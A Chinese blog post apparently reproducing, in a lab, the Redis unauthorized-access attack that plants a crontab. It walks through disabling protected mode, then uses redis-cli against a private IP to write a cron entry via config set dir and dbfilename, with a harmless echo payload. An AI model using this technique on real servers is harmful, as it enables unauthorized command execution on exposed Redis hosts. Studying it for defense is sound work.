• 欢迎访问显哥博客,本网站纯属学习技术,绝无商业用途,欢迎小伙伴们共同学习!研究技术!QQ:52249909 加我QQ
  • 世界75亿人,这么小的概率,能认识你,是我一生的幸运,不妨加个QQ接触一下:52249909 加我QQ

Redis漏洞入侵实战cron乱码【显哥出品,必为精品】

Redis lixian 3年前 (2021-08-30) 27531次浏览 1个评论 扫描二维码
文章目录[隐藏]

cron定时任务一直从乱七八糟的网站下载程序,crontab也都是乱码,原来的定时任务已被清空。
Redis漏洞入侵实战cron乱码【显哥出品,必为精品】

开启redis漏洞

关闭安全模式

#redis.conf文件中有一个参数如下,这是redis服务的保护模式,no为关闭安全模式
protected-mode no

redis的启动用户为root

Redis漏洞入侵实战cron乱码【显哥出品,必为精品】

入侵测试

#远程连接redis服务器,不需要密码
[root@jenkins /var/spool/cron]# redis-cli -h 192.168.1.3
192.168.1.3:6379> set 0 "\n\n*/1 * * * * echo Test > /home/test.txt \n\n"
OK
192.168.1.3:6379> config set dir /var/spool/cron/
OK
192.168.1.3:6379> config set dbfilename www
OK
192.168.1.3:6379> save
OK
192.168.1.3:6379> 

Redis漏洞入侵实战cron乱码【显哥出品,必为精品】


本站博主 , 版权所有丨如未注明 , 均为原创
转载请注明原文链接:Redis漏洞入侵实战cron乱码【显哥出品,必为精品】
喜欢 (0)

您必须 登录 才能发表评论!

(1)个小伙伴在吐槽
  1. I have read your article carefully and I agree with you very much. This has provided a great help for my thesis writing, and I will seriously improve it. However, I don't know much about a certain place. Can you help me?
    gateio2023-03-10 07:11